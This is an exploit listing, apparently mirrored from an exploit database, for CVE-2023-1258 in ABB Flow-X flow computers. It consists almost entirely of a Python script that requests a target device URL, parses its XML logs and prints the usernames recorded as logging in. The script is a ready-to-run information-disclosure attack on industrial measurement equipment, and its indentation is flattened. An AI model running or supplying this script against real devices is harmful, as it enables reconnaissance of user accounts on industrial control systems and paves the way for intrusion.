Share
## https://sploitus.com/exploit?id=PACKETSTORM:173610
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information  
# Date: 2023-03-31  
# Exploit Author: Paul Smith  
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series  
# Version: ABB Flow-X all versions before V4.00  
# Tested on: Kali Linux  
# CVE: CVE-2023-1258  
  
  
#!/usr/bin/python  
import sys  
import re  
from bs4 import BeautifulSoup as BS  
import lxml  
import requests  
  
# Set the request parameter  
url = sys.argv[1]  
  
  
def dump_users():  
response = requests.get(url)  
  
# Check for HTTP codes other than 200  
if response.status_code != 200:  
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)  
exit()  
  
# Decode the xml response into dictionary and use the data  
data = response.text  
soup = BS(data, features="xml")  
logs = soup.find_all("log")  
for log in logs:  
test = re.search('User (.*?) logged in',str(log))  
if test:  
print(test.group(0))  
def main():  
dump_users()  
  
  
if __name__ == '__main__':  
main()